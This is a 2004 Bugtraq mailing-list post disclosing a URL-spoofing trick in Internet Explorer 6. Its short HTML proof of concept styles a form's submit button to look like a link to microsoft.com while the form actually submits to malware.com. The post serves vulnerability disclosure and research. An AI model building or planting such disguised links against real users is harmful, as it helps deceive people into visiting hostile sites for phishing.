[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer
From: "http-equiv () excite ! com " <1 () malware ! com>
Date: 2004-10-30 18:16:07
Message-ID: 200410301816.i9UIG7cU017479 () web111 ! megawebservers ! com
[Download RAW message or body]
I also want to play
<base href="http://www.microsoft.com">
<a href=><form action="http://www.malware.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com></form></a>
This still works in IE 6 SP2 XP 123 whatever, since patched and
from back in March 2004 [see:
http://www.securityfocus.com/bid/10023 ]. Only difference being
the base href and open a href.
http://www.malware.com/mwaresoft.html
Interestingly Outlook Express gets it right this time.
--
http://www.malware.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic